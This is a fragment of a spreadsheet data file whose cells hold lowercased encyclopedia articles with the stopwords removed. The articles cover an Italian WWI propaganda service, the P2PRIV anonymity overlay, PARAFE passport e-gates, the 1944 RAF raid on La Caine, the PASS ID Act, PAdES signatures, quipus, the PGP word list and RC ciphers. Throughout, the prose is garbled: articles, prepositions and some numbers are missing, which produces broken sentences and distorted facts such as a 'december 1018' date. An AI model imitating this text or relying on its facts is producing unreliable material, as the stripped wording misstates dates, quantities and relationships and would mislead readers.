sent average three postcards three letters week, postcards allowed high command propagandise conscript family. time, forms visual propaganda established, cinema projections distribution photographs, often reproduced illustrative magazines postcards. case, role service distribute material soldiers' houses mobile cinemas, production materials organised high command itself.: officers, main audience service initiatives, continued receive patriotic lectures prominent civilians, parliamentarians, professors senior military officials. during meetings officers given books, brochures, moral liaison notebook devised lombardo radice, used materials spread ideas subordinates. service aware lectures appeal ordinary soldiers officers.: 133–4 there studies theatre front. know theatres troops operating regularly since summer 1917, 1918 service army hired company puppeteers, held three shows travelling theatre.: service troops overseas july 1918, army corps general alberico albricci transferred western front, need establish surveillance propaganda unit troops france. this differed somewhat structure service italy. propaganda office established general inspectorate auxiliary troops france, dedicated sections group command. main task propaganda although moral material needs troops also considered; however, troop assistance service similar offered service italy, similar structure existed italy central office, subsections officers. france, officers decision-making autonomy typical officer italy. instead relied completely instructions commander also relieved usual duties service.: 93–4 army corps stationed albania, april 1918 propaganda office established which, unlike service italy, charged surveillance troops (despite required "sense needs"). instead limited propaganda (soldier's houses, refreshment points, soldier's newspapers, etc.). officers charge full freedom action, department commanders could direct officers carry propaganda duties exempt normal service.: 94–5 supervisory body also established military contingent sent slovakia december 1018, remained june 1919. there insufficient documentation assess possible service functions italian expeditionary forces macedonia, palestine, murmansk manchuria.: p-service with signing armistice villa giusti november 1918, longer necessary service foster fighting spirit troops, work remained fundamental discipline army preparation soldiers demobilization. activities existing soldiers' houses intensified ones opened. classes illiterate encouraged cooperative outlets opened, ensure "the soldier returns home calm soul". order prepare younger conscripts civilian work, march 1919 badoglio launched technical education program.: work assistance propaganda conversations also continued, officers continuing report morale troops, officers assigned carry surveillance activities among population.: these officers chosen knowledge local dialects, paid particular attention discharged soldiers. trusted members clergy military chaplains also sent population watch popular demonstrations schools. organized spread "spirit italianness", identifying arresting enemy agents deserters.: 144–5 exact date service shut known, factors brought included escalating costs liberal ideology government could tolerate propaganda period political normalization. prime minister orlando declared favor suppressing organized propaganda outside army. final demobilization began july, date also heralded army intelligence offices, sections. from july 1919 became part information office general staff corps rome.: also propaganda censorship italy first world further reading lorenzini disfattisti traditori. comandi italiani "nemico interno" (novembre 1917 novembre 1918), «percorsi storici», (2014) references</t>
  </si>
  <si>
    <t>P2PRIV</t>
  </si>
  <si>
    <t>peer-to-peer direct anonymous distribution overlay (p2priv) conceptual anonymous peer-to-peer overlay network introduced warsaw university technology 2007. p2priv hides initiator communications parallelization network nodes receiving sending user data independently. this concept contrary anonymity networks topologies. anonymity networks employ serial communication common basis hide initiator cascade network nodes forwarding user data consecutively. main advantage p2priv viewed possibility providing high-speed anonymous data transfer anonymous data sent directly independently distributed network. last update site 2009. official site since 2013. description p2priv separates anonymization user data transport. before sending data, signalization tokens forwarded classical anonymous cascades towards formation so-called cloning cascades (cc). well-known anonymous techniques (i.e. network crowds' random walk algorithm) utilized hiding initiator then, random interval time, member (i.e. group clones true initiator) communicates directly independently destination nodes. process finding true initiator among network nodes hard perform even adversary able collude significant part overlay network. weaknesses p2priv requires fully distributed network distributed information content assure high-anonymous access resources. utility p2priv client-server like services, e.g., world wide system, hybrid topologies, problematic current form. also anonymous secure communication overlay network references external links p2priv project paper proposing p2priv: concept anonymous direct distribution overlay system paper describing overlay transport protocol p2priv: low-latency parallel transport anonymous peer-to-peer overlays anonymity bibliography</t>
  </si>
  <si>
    <t>PARAFE</t>
  </si>
  <si>
    <t>parafe (abbreviation passage automatisé rapide frontières extérieures automated fast-track crossing external borders) passport verification program operated france's direction centrale police frontières (dcpaf; border police). parafe, incorporating automated self-service barriers operated dcpaf, located immigration checkpoints arrival departure halls paris, marseille, nice lyon airports london pancras railway station, offering alternative using desks staffed immigration officers. gates facial recognition technology verify user's identity data stored chip biometric passport. eligibility present, citizens following countries parafe egates, provided aged years hold valid biometric passports. minors aged 12–17 hold valid eu/eea, andorran, british, monegasque marinese biometric passport also gates arrival, departure french authorities strict rules unaccompanied minors leaving country.prior march 2019, eu/eea swiss biometric passport holders could parafe gates. march 2019, eligibility extended andorran, monegasque marinese biometric passport holders. december 2020, eligibility extended australian, canadian, japanese, zealand, singaporean, south korean united states biometric passport holders. operation parafe gates, traveller must biometric passport france certain countries (these epassports biometric logo front cover). computer gate scanner reads information contained chip inside passport, camera takes picture passenger biometric patterns verified picture saved passport chip. epassport gate scanner reads information contained chip inside passport runs data numerous databases determine traveller security risk, camera takes picture traveller officer control station behind gates checks image captured camera matches passport (facial recognition). once data verification facial recognition process complete, doors automatically either open, signifying traveller permitted enter and/or exit country, remain closed stop icon illuminate, demonstrating traveller failed security checks personally meet immigration officials. availability present, parafe egates available following locations: paris charles gaulle airport paris orly airport bordeaux–mérignac airport euroairport basel mulhouse freiburg marseille provence airport lyon–saint-exupéry airport nice airport eurostar paris gare nord terminal (juxtaposed controls) eurostar london pancras terminal (juxtaposed controls) eurotunnel folkestone terminal (juxtaposed controls) eurotunnel calais terminal (juxtaposed controls) history previous generation parafe egates used fingerprint technology verify identity passenger first introduced 2010. this phased since considered "insufficiently intuitive" (which hand, finger), slower process non-french citizens actively sign french airport every years able egates.the first egates replaced early 2017 pilot project facial recognition technology, extended airports pancras station throughout rest 2017 2018. there still gates left work fingerprint technology registrations still accepted. also epassport gates similar system operated united kingdom smartgate similar system operated australia european automated border control systems external links crossing borders: parafe, automated immigration gates references</t>
  </si>
  <si>
    <t>RAF raid on La Caine (1944)</t>
  </si>
  <si>
    <t>raid caine (1944) attack normandy second tactical force royal force (raf) june 1944. attack made château caine, south-west city caen, north thury-harcourt. château recently occupied panzergruppe west, command organisation german panzer divisions france belgium. eighteen staff officers killed attack commander, general panzertruppen geyr schweppenburg wounded. counter-offensive prepared allied beachhead panzergruppe postponed cancelled. command transferred headquarters panzer corps; panzergruppe west withdrawn paris remained action june. background panzergruppe west generalfeldmarschall (field marshal) gerd rundstedt, oberbefehlshaber west west commander german forces western europe) established panzergruppe west, (general panzertruppe geyr schweppenburg november 1943 july 1944) headquarters administration training seven panzer divisions based northern france belgium. organisation also command panzer divisions strategic reserve anticipated allied invasion britain. june 1944, three days beginning operation overlord, invasion france western allies, generalfeldmarschall erwin rommel, commander heeresgruppe (army group responsibility defence northern france drove panzergruppe west gave orders counter-offensive allied landings normandy. government code cypher school government code cypher school (gc&amp;cs) code-breaking organisation bletchley park read german radio signals encrypted enigma cypher machine part elaborate system wireless listening posts, traffic analysis direction finding used germany war. ultra decrypts march 1944 established existence panzergruppe west headquarters paris. increase wireless traffic panzergruppe west detected british monitoring section june 1944, 17th panzergrenadier division came command panzergruppe. site source identified high-frequency direction finding ("huff-duff") château commune caine, south-west city caen. information forwarded supreme headquarters allied expeditionary force (shaef) headquarters normandy signals 7171 7225. panzergruppe west taken residence château left vehicles orchard camouflage. prelude early june, second tactical force (2nd taf) royal force (raf) ordered immediately attack château every available aircraft. hurn dorset, wing, comprising squadron, squadron squadron equipped hawker typhoon fighter-bombers holmsley south, squadron wing ordered readiness. dunsfold, wing, comprising squadron, squadron (netherlands) squadron plus squadron wing hartford bridge flying north american b-25 mitchell medium bombers alerted. maximum effort consisted typhoons squadron eighteen mitchells medium bomber squadrons. typhoons loaded eight 60-pound rp-3 rockets mitchells carry maximum bomb loads eight (227 bombs; four squadrons spitfires escort bombers. plan attack rocket-firing typhoons altitude, combined bombing mitchells medium altitude. preparations morning june overcast cloudy 10:30 a.m. briefing raid 2:00 p.m. postponed cloud cover diminished (times given british double summer time (1941–1945) hours ahead greenwich mean time). wing commander lynn wing commander (flying) lead mitchells squadron flying head formation. with weather still ideal, first mitchell bomber squadron aircraft carrying navigation equipment, precaution cloud target. while waiting weather, typhoons wing flew raids emplacements near caen. eighteen mitchells squadron took three flights 8:00 p.m. followed seventeen mitchells (netherlands) squadron (commander burgerhout).at 8:10 p.m. sixteen bombers squadron (squadron leader eager) took off, three squadrons circling gaining height getting formation, setting course france 8:20 p.m. over selsey bill eighteen mitchells squadron (wing commander mitchell) joined formation. spitfire defence great britain (adgb defensive part fighter command since november 1943) close escort high cover three spitfire squadrons group (the offensive part fighter command since split adgb) arrived soon after. mitchell squadron turned back mechanical failure squadron returned bomb caine, loss pressure instrument fault. spare aircraft four typhoon squadrons joined making typhoons, eight flew without rocket armament, fighters. typhoons attack waves, thirty minutes apart, first wave attack motor transport around château synchronised bombing mitchells second wave attack anything left. attack evening june, general sigismund-helmut dawans, chief staff panzergruppe west staff officers dinner château caine raid sirens went off. officers hurried outside watched typhoons binoculars, aware target last minute; schweppenburg arrived attack. typhoons squadrons fired rockets 2,000 (610 12,000 (3,658 mitchells wing moved formation squadron base squadrons remaining flights six.at 9:15 p.m. bombers released five-hundred pound bombs, except mitchell, whose eight bombs hung bombs landed great accuracy château grounds, killing dawans staff officers, schweppenburg another officer wounded. four typhoons carrying rockets strafed village montigny nearby mitchells turned north-west, receiving flak vicinity caen. second wave rocket-armed typhoons arrived find château panzergruppe west vehicles destroyed fired rockets anything still standing. mitchells landed 10:25 p.m. preparations began night operation. aftermath analysis allied crews debriefed, claimed success; bomber crews reporting target; anti-aircraft fire sparse german fighters intervened, germans appeared surprised. attack destroyed german army organisation western theatre capable handling large number mobile divisions; survivors panzergruppe west withdrawn paris ready resume operations june. german command sector temporarily given ss-obergruppenführer sepp dietrich panzer corps. 2009 edition history ultra information, ralph bennett wrote armoured counter-attack allied beachhead planned june, postponed hours cancelled. bletchley park decrypted german signals panzergruppe west destroyed would withdrawn paris reconstituted. appointment staff general heinrich eberbach, delayed plans german armoured counter-offensive three weeks overtaken events. destruction panzergruppe contributed loss initiative germans. german suspicions aroused allied code breaking, reconnaissance aircraft seen raid. decrypts revealing whereabouts panzergruppe west first series revealed positions tactically valuable targets, including positions fuel ammunition dumps, attacked exacerbate german shortages, also revealed ultra decrypts. casualties eighteen staff officers panzergruppe west known killed raid, including chief staff, dawans, interred cambe german cemetery schweppenburg wounded. château badly damaged nearby orchard, vehicles parked, thoroughly bombed communications equipment destroyed. notes footnotes references further reading external links historical society journal: overlord campaign</t>
  </si>
  <si>
    <t>PASS ID</t>
  </si>
  <si>
    <t>pass 1261) proposed u.s. intended replace real like real implements federal standards state identification documents. currently, states obligated follow standards, pass takes full effect, federal agencies accept identification states materially comply law. citizens non-compliant states would need provide federally issued documents social security card u.s. passport order enter federally owned buildings. pass would eliminate real requirements considered excessive, obligation verify birth certificates issuing department, shared national databases. however, critics charge pass still require storage digital records documents proving citizenship, birth certificates. also permit technology like rfid incorporated drivers' licenses. further reading hsu, spencer (2009-06-13). "administration plans scale back real law". washington post. retrieved 2010-05-21. harper (2009-07-16). "review real hearing". cato@liberty. christopher calabrese (2009-07-15). "like frankenstein's monster, senate revive real id". american civil liberties union. archived original 2012-12-20. retrieved 2009-08-10. "pass real-id? tweedle-dum tweedle-dee?". identity project. 2009-07-17. references external links "pass act" (pdf). united states government printing office.</t>
  </si>
  <si>
    <t>PAdES</t>
  </si>
  <si>
    <t>pades (pdf advanced electronic signatures) restrictions extensions 32000-1 making suitable advanced electronic signatures. this published etsi 142. description while 32000-1 provide framework digitally signing documents, pades specifies precise profiles making compliant etsi standards digital signatures (advanced electronic signature qualified electronic signature qes). etsi (european technical standards institute) function issuing technical standards delegation eidas regulation (european union regulation electronic identification trust services electronic transactions internal market). eidas regulation enhances repeals electronic signatures directive 1999/93/ec. eidas legally binding member states since july 2014 unlike directive replaces, eidas regulation directly applicable without implementing interpreting legislation. electronic signature recognised eidas (including ‘click accept’) cannot denied validity effectiveness reason electronic. ‘digital signature’ electronic signature implementing digital certificates compliance advanced qualified described eidas (and implementations developed etsi technology level) support pades. higher evidentiary value simple ‘standard’ electronic signatures. recognised legal value handwritten signature.pades standards travel direction aims digital signatures (aes qes). this means easily verified reader uniquely linked signatory identity signatory); capable identifying signatory (‘attribution’); signatory control data used signature creation control custody, portable token authentication certificate downloaded cloud provider); pades easily, identified data attached signature changed signing.pades levels verification digital certificate, simple basic (b-b, indicating signature executed certificate valid date) complex (b-ltv) allowing electronically signed documents remain valid long periods (long term validity) even underlying cryptographic algorithms certificates expired. pades recognizes digitally-signed documents used archived many years, need evidenced court, signer certificates expired (after months b-b) enquired contacting certification authority. b-lt b-ltv (the complex) certificates remain valid long term. pades allows certificates verified even many decades time future, spite technological advances. document validar confirm signature valid concept known long-term validation (ltv).the pades standard, etsi european standard (en) 142, introduces number adaptations extensions satisfy directive's requirements. etsi feed european-specific elements back inclusion next release standard, 32000-2. pades context electronic signatures electronic signature paperless sign document using unique credential associated given person logically attached associated document, carrying authority equivalent handwritten signature. used authenticate signer well detect changes document made signed. electronic signatures recognized catalyst electronic commerce, notably internet transactions. availability electronic signature techniques already major stimulus ebusiness egovernment. digital signatures secure legally binding means implement electronic signatures three cryptographic algorithms: generating algorithm randomly selects private corresponding public signing algorithm produces digital signature message private signature verifying algorithm uses public key, message digital signature confirm authenticity message.for documents, signature data incorporated directly within signed document, much signature becomes integral part paper document, allowing complete self-contained file copied, stored distributed simple electronic file. signature also visual representation form field, might paper document. significant advantage pades deployed means widely available software: require development customization specialized software.pades complementary standards implementation electronic signatures cryptographically secured digital signatures compliance eidas regulation. like pades, legally binding european union suited applications involve human-readable documents: cryptographic message syntax advanced electronic signatures (cades) advanced electronic signatures (xades). legal admissibility recognizes three different eidas-compliant implementations advanced electronic signatures digital signatures: pades, xades cades.an electronic signature carry legal effect used evidence legal proceedings. qualified electronic signature shall equivalent legal effect handwritten signature. qualified certificate issued member state shall recognized qualified electronic signature member states. pades standard (etsi 142) pades etsi technical specification contains parts: part building blocks pades baseline signatures part additional pades signatures profilesthe pades standards downloaded etsi download page. etsi replaced previous standards etsi etsi 778. also european telecommunications standards institute (etsi) cades, advanced electronic signature xades, advanced electronic signature associated signature containers (asic) trusted timestamping references external links 32000-1:2008 document standard international organization standardization free open-source java library creating/manipulating pades/cades/xades/asic signatures github repository secureblackbox cross-platform library creating manipulating xades, cades, pades asic signatures etsi pades explored explained ades toolset</t>
  </si>
  <si>
    <t>Quipu</t>
  </si>
  <si>
    <t>quipu (also spelled khipu) recording devices fashioned strings historically used number cultures region andean south america.a quipu usually consisted cotton camelid fiber strings. inca people used collecting data keeping records, monitoring obligations, collecting census records, calendrical information, military organization. cords stored numeric values encoded knots, often base positional system. quipu could thousands cords. configuration quipus "compared string mops." archaeological evidence also shown finely carved wood supplemental, perhaps sturdier, base color-coded cords would attached. relatively small number survived. objects identified unambiguously quipus first appear archaeological record first millennium (though debated quipus much earlier). they subsequently played part administration kingdom cusco later tawantinsuyu, empire controlled inca ethnic group, flourishing across andes 1100 1532 some argued region subsumed spanish empire, quipus actively destroyed, replaced european writing numeral systems; spanish response quipu much complicated this. while certainly quipu identified idolatrous destroyed, spaniards actually promoted adaptation quipu recording system needs colonial administration; priests advocated quipus ecclesiastical purposes. several modern villages, quipus continued important items local community, albeit ritual rather practical use. unclear many intact quipus still exist, many stored away mausoleums.knotted strings unrelated quipu used record information ancient chinese, tibetans japanese.quipu spanish spelling common spelling english. khipu (pronounced [ˈkʰɪpʊ], plural: khipukuna) word "knot" cusco quechua. quechua varieties, term kipu. etymology "quipu" quechua word meaning "knot" knot". terms "quipu" "khipu" simply spelling variations word. "quipu" traditional spanish spelling, "khipu" reflects recent quechuan aymaran spelling shift. purpose most information recorded quipus consists numbers decimal system, "indian chiefs ascertain[ing] province lost another balanc[ing] losses them" spanish invasion. early years spanish conquest peru, spanish officials often relied quipus settle disputes local tribute payments goods production. quipucamayocs (quechua khipu kamayuq "khipu specialist", plural: khipu kamayuqkuna) could summoned court, bookkeeping recognised valid documentation past payments. some knots, well features, color, thought represent non-numeric information, deciphered. generally thought system include phonetic symbols analogous letters alphabet. however gary urton suggested quipus used binary system could record phonological logographic data. student manny medrano gone find quipus decode match census data.the lack clear link indigenous peruvian languages quipus historically supposition quipus glottographic writing system phonetic referent. frank salomon university wisconsin argued quipus actually semasiographic language, system representative symbols music notation numerals relay information directly related speech sounds particular language. khipu database project (kdp), begun gary urton, already decoded first word quipu–the name village, puruchuco–which urton believes represented three-number sequence, similar code. conjecture correct, quipus known example complex language recorded system.most recently, sabine hyland made first phonetic decipherment quipu, challenging assumption quipus represent information phonetically. after contacted local woman meche moreyra orozco, head association collatinos lima, hyland granted access epistolary quipus juan collata. these quipus exchanged 18th century rebellion spanish government. combination color, fiber direction leads total combinations quipus, within range logosyllabic writing system. exchanging information rebellion quipus would prevented spanish authorities understanding messages intercepted, collata quipus non-numeric. with help local leaders, described quipu language animals", hyland able translate names ayllus, family lineages, received sent quipu. translation relied phonetic references animal fibers colors relevant quipu cords. future research attempt determine whether hyland's findings applicable quipus inca period earlier. numeral system marcia ascher robert ascher, analyzed several hundred quipus, shown information quipus numeric, numbers read. each cluster knots digit, three main types knots: simple overhand knots; "long knots", consisting overhand knot additional turns; figure-eight knots. aschers’ system, fourth type knot—figure-eight knot extra twist—is referred "ee". number represented sequence knot clusters base powers shown position along string, position aligned successive strands. digits positions higher powers represented clusters simple knots (e.g., four simple knots "tens" position). digits "ones" position represented long knots (e.g., knot four turns). because knots tied, digit cannot shown represented position figure-eight knot. zero represented absence knot appropriate position. because ones digit shown distinctive way, clear number ends. strand quipu therefore contain several numbers.for example, represents four simple knots, represents long knot three turns, represents figure-eight knot represents space: number would represented number would represented number followed number would represented e.this reading confirmed fortunate fact: quipus regularly contain sums systematic way. instance, cord contain next cords, relationship repeated throughout quipu. sometimes sums sums well. such relationship would improbable knots incorrectly read.some data items numbers ascher ascher call number labels. they still composed digits, resulting number seems used code, much numbers identify individuals, places, things. lacking context individual quipus, difficult guess given code might mean. other aspects quipu could communicated information well: color-coding, relative placement cords, spacing, structure cords sub-cords. literary uses some argued numeric information present quipus writing system. this would especially important discovery surviving record written quechua predating spanish invasion. possible reasons apparent absence written language include destruction spanish written records, successful concealment inca peoples records. making matter even complex, inca 'kept separate "khipu" province, pendant string recorded number people belonging category.' this creates another step process decryption addition spanish attempts eradicating system. historians edward hyams george ordish believe quipus recording devices, similar musical notation, notes page present basic information, performer would bring details life.in 2003, checking geometric signs appear drawings inca dresses first chronicle good government, written felipe guaman poma ayala 1615, william burns glynn found pattern seems decipher words quipus matching knots colors strings. august 2005, edition journal science includes report titled "khipu accounting ancient peru" anthropologist gary urton mathematician carrie brezine. their work represent first identification quipu element non-numeric concept, sequence three figure-eight knots start quipu seems unique signifier. could toponym city puruchuco (near lima), name quipu keeper made subject matter, even time designator.beynon-davies considers quipus sign system develops interpretation physical structure terms concept data system.khipu kamayuqkuna (knot makers/keepers, i.e., former inca record keepers) supplied colonial administrators variety quantity information pertaining censuses, tribute, ritual calendrical organization, genealogies, matters inka times. performing number statistical tests quipu sample 42527, study alberto sáez-rodríguez discovered distribution patterning z-knots organize information system real star pleiades cluster.laura minelli, professor pre-columbian studies university bologna, discovered something believed seventeenth-century jesuit manuscript describes literary quipus, titled historia rudimenta linguae piruanorum. this manuscript consists nine folios spanish, latin, ciphered italian texts. owned family neapolitan historian clara miccinelli, manuscript also includes wool quipu fragment. miccinelli believes text written italian jesuit missionaries, joan antonio cumis giovanni anello oliva, around 1610–1638, blas valera, mestizo jesuit sometime 1618. along details reading literary quipus, documents also discuss events people spanish conquest peru. according cumis, since many quipus burned spanish, remained analyze. related manuscript, word pacha kamaq, inca deity earth time, used many times quipus, syllables represented symbols formed knots. following analysis "pacha kamaq", manuscript offers list many words present quipus. however, bruce mannheim, director center latin american studies university michigan, colgate university's gary urton, question origin authenticity. these documents seem inspired freely 1751 writing raimondo sangro, prince sansevero. history tawantin suyu quipucamayocs (quechua khipu kamayuq, "khipu-authority"), accountants tawantin suyu, created deciphered quipu knots. quipucamayocs could carry basic arithmetic operations, addition, subtraction, multiplication, division. they kept track mita, form taxation. quipucamayocs also tracked type labor performed, maintained record economic output, census counted everyone infants "old blind 80". system also used keep track calendar. according guaman poma, quipucamayocs could "read" quipus eyes closed.quipucamayocs class people, "males, fifty sixty", members inca society quipus. inca historians used quipus telling spanish tawantin suyu history (whether recorded important numbers actually contained story unknown). members ruling class usually taught read quipus inca equivalent university, yachay wasi (literally, "house teaching"), third year schooling, higher classes would eventually become bureaucracy. spanish invasion 1532, spanish empire's conquest andean region began, several spanish conquerors making note existence quipus written records invasion. earliest known example comes hernando pizarro, brother spanish military leader francisco pizarro, recorded encounter 1533 traveled along royal road highlands central coast. journey encountered several quipu keepers, later relating keepers "untied knots deposits section khipu], [re-]tied another section khipu]."the spanish authorities quickly suppressed quipus. christian officials third council lima banned ordered burning quipus 1583 used record offerings non-christian gods therefore considered idolatrous objects obstacle religious conversion. contemporary social importance quipu system operated method calculation social organization, regulating regional governance land use. while evidence latter still critical scholars around world, fact kept without confirmed level fluent literacy system testament historical 'moral authority.' today, "khipu" regarded powerful symbol heritage, 'unfurled' handled 'pairs [contemporary] dignitaries,' system 'construction embed' modern 'cultural knowledge.' ceremonies 'curated, even though longer read,' even support case societal honor significance associated quipu. even today, 'the knotted cords must present displayed village officers leave begin service, draping cords incoming office holders instantiates moral political authority past.' these examples indicative quipu system fundamental mathematically linguistically original inca, also cultural preservation original empire's descendants. anthropologists archaeologists working peru highlighted known cases quipus continued used contemporary communities, albeit ritual items seen "communal patrimony" rather devices recording information. khipu system, useful method social management inca, also link cuzco census, primary methods population calculation. this also allowed historians anthropologists understand census "decimal hierarchy" system inca used, actually 'initiated together,' fact 'conceptually closely linked.' tupicocha, peru 1994, american cultural anthropologist frank salomon conducted study peruvian village tupicocha, quipus still important part social life village. 1994, village quipus structure similar pre-columbian quipus still used official local government record-keeping functions, although villagers associate quipus inca artifacts. cristóbal rapaz, peru villagers cristóbal rapaz (known rapacinos), located province oyón, keep quipu ceremonial building, kaha wayi, surrounded walled architectural complex. also within complex disused communal storehouse, known pasa qullqa, formerly used protect redistribute local crops, rapacinos believe quipu record process collecting redistributing food. entire complex important villagers, "the seat traditional control land use, centre communication deified mountains control weather".in 2004, archaeologist renata peeters institute archaeology london) cultural anthropologist frank salomon university wisconsin) undertook project conserve quipus rapaz building increasingly poor condition. archaeological investigation 1912 anthropologist leslie leland locke published "the ancient quipu, peruvian knot record," american anthropologist, series (1912) 325-332. this first work show inca (inka) empire predecessor societies used quipu (khipu) mathematical accounting records decimal system. archaeologist gary urton noted 2003 book signs inka khipu estimated "from studies published works scholars extant quipu public private collections around world."according khipu database project undertaken harvard university professor gary urton colleague carrie brezine, quipus reported exist across globe. their whereabouts range europe north south america. most housed museums outside native countries, reside native locations care descendants made knot records. table largest collections shown below. while patrimonial quipu collections accounted database, numbers likely unknown. prominent patrimonial collection held rapazians rapaz, peru, recently researched university wisconsin–madison professor, frank salomon. anthropology/archaeology department university california santa barbara also holds quipu. preservation quipus made fibers, either spun plied thread wool hair alpaca, llama, guanaco vicuña, though also commonly made cellulose like cotton. knotted strings quipus often made "elaborate system knotted cords, dyed various colors, significance known magistrates". fading color, natural dyed, cannot reversed, indicate damage fibers. colors darken attacked dust certain dyes mordants. quipus found adornments, animal shells, attached cords, non-textile materials require additional preservation measures.quipus preserved using techniques minimise future degradation. museums, archives special collections adopted preservation guidelines textile practices. environmental controls used monitor control temperature, humidity light exposure storage areas. textiles, cool, clean, dark environments suitable. heating, ventilating conditioning, hvac systems, buildings house quipu knot records usually automatically regulated. relative humidity lower, temperatures, high temperatures damage fibres make brittle. damp conditions high humidity damage protein-rich material. textiles suffer damage ultraviolet (uv) light, include fading weakening fibrous material. when quipus display, exposure ambient conditions usually minimized closely monitored.damage occur storage. accessible items storage, greater chance early detection. storing quipus horizontally boards covered neutral paper (paper neither acid alkaline) prevent potential acid transfer preservation technique extends life collection. fibers abraded rubbing attached sticks rods, weight held upright position. extensive handling quipus also increase risk damage.quipus also closely monitored mold, well insects larvae. textiles, major problems. fumigation recommended fiber textiles displaying mold insect infestations, although common practice ridding paper mold insects. conservators field library science skills handle variety situations. even though quipus hundreds cords, cord assessed treated individually. quipu cords "mechanically cleaned brushes, small tools light vacuuming". just application fungicides recommended quipus mold, neither solvents clean them. even people tried preserve quipus, corrective care still required. quipus conserved close place origin, local camelid wool fibres natural colors obtained used mend breaks splits cords. rosa choque gonzales rosalia choque gonzales, conservators southern peru, worked conserve rapaz patrimonial quipus andean village rapaz, peru. these quipus undergone repair past, conservator team used local camelid wool fibers spin around area repair similar fashion earlier repairs found quipu.when gary urton, professor anthropology harvard, asked "are [quipus] fragile?", answered, "some are, can't touch would break turn dust. many quite well preserved, actually study without harm. course, time touch ancient fabric like that, damage, strings generally quite durable."ruth shady, peruvian archeologist, discovered quipu perhaps proto-quipu believed around 5,000 years coastal city caral. quite good condition, "brown cotton strings wound around thin sticks", along series offerings, including mysterious fiber balls different sizes wrapped 'nets' pristine reed baskets. piles cotton uncombed containing seeds, though turned dirty brown ages ball cotton thread" also found preserved. good condition articles attributed arid condition caral. fictional portrayals feature film dora lost city gold, premiered 2019, features stone quipu title character dora "reads" touching provide protagonists clue finding treasure climax story. chapter book wine-dark patrick o’brian features message communicated using quipus. characters series blind, strings knots send messages. book rise fall d.o.d.o. neal stephenson nicole galland includes quipus witches means navigate complex algorithms time travel. character amelie prominently wears quipu video game death stranding. references footnotes bibliography external link khipu field guide (khipu drawings investigations world's largest khipu database) quipu: modern mystery untangling mystery inca urton, gary (1998). "from knots narratives: reconstructing historical record keeping andes spanish transcriptions inka khipus". ethnohistory. (3): 409–438. doi:10.2307/483319. jstor 483319. science: inka accounting practices open popular hoc) khipu decipherment project (now facebook) history counting-plainmath.net high andes, keeping incan mystery alive (new york times, august 2010) khipu cristobal rapaz “making sense pre-columbian,” vistas: visual culture spanish america, 1520–1820. college student decoded data hidden inca knots katherine davis-young (atlas obscura, 2017-12-14) discovery "puruchuco" toponym experts 'decipher' inca strings "peruvian 'writing' system goes back 5,000 years". archived original july 2005. retrieved january 2018. msnbc american textile history museum american institute conservation historic artistic works</t>
  </si>
  <si>
    <t>PGP word list</t>
  </si>
  <si>
    <t>word list ("pretty good privacy word list", also called biometric word list reasons explained below) list words conveying data bytes clear unambiguous voice channel. they analogous purpose nato phonetic alphabet used pilots, except longer list words used, word corresponding distinct numeric byte values. history structure word list designed 1995 patrick juola, computational linguist, philip zimmermann, creator pgp. words carefully chosen phonetic distinctiveness, using genetic algorithms select lists words optimum separations phoneme space. candidate word lists randomly drawn grady ward's moby pronunciator list material search, successively refined genetic algorithms. automated search converged optimized solution hours alpha, particularly fast machine era. zimmermann–juola list originally designed used pgpfone, secure voip application, allow parties verbally compare short authentication string detect man-in-the-middle attack (mitm). called biometric word list authentication depended human users recognizing other's distinct voices read compared words voice channel, binding identity speaker words, helped protect mitm attack. list used many situations biometric binding identity needed, calling biometric word list imprecise. later, used compare verify public fingerprints voice channel. this known applications "biometric" representation. when applied pgp, list words refined, contributions callas. more recently, used zfone zrtp protocol, successor pgpfone. list actually composed lists, containing phonetically distinct words, word represents different byte value 255. lists used reading aloud long random sequences human words usually risks three kinds errors: transposition consecutive words, duplicate words, omitted words. detect three kinds errors, lists used alternately even-offset bytes odd-offset bytes byte sequence. each byte value actually represented different words, depending whether byte appears even offset beginning byte sequence. lists readily distinguished number syllables; even list words syllables, list three. lists maximum word length letters, respectively. using two-list scheme suggested zhahai stewart. word lists here lists words presented pgpfone owner's manual. examples each byte bytestring encoded single word. sequence bytes rendered network byte order, left right. example, leftmost (i.e. byte considered "even" encoded using even word table. next byte right (i.e. byte considered "odd" encoded using word table. this process repeats bytes encoded. thus, "e582" produces "topmost istanbul", whereas "82e5" produces "miser travesty". public fingerprint displayed hexadecimal e582 94f2 e9a2 2748 6e8b 061b 31cc 528f d7fa 3f19would display words (the "biometric" fingerprint) topmost istanbul pluto vagabond treadmill pacific brackish dictator goldfish medusa afflict bravadochatter revolver dupont midsummer stopwatch whimsical cowbell bottomlessthe order bytes bytestring depends endianness. other word lists data there several word lists conveying data clear unambiguous voice channel: nato phonetic alphabet maps individual letters digits individual words s/key system maps numbers short words characters publicly accessible 2048-word dictionary. dictionary used 1760 2289. diceware system maps five base-6 random digits (almost bits entropy) word dictionary 7,776 distinct words. electronic frontier foundation published improved word lists based concept fips 181: automated password generator converts random numbers somewhat pronounceable "words". mnemonic encoding converts bits data words vocabulary 1626 words. what3words encodes geographic coordinates dictionary words. bip39 standard permits enconding cryptographic fixed size (128 bits, usually unencrypted master cryptocurrency wallet) short sequence readable words known seed phrase, purpose storing offline. this used cryptocurrencies bitcoin monero. references this article incorporates material copyrighted corporation licensed free documentation license. (per callas, cto, corporation, 4-jan-2007)</t>
  </si>
  <si>
    <t>RC algorithm</t>
  </si>
  <si>
    <t>algorithms symmetric-key encryption algorithms invented rivest. "rc" stand either rivest's cipher informally, ron's code. despite similarity names, algorithms part unrelated. there algorithms far: never published. 64-bit block cipher developed 1987. broken ever used. stream cipher. 32/64/128-bit block cipher developed 1994. rc6, 128-bit block cipher based heavily rc5, finalist developed 1997. references</t>
  </si>
  <si>
    <t>Operation Legacy</t>
  </si>
  <si>
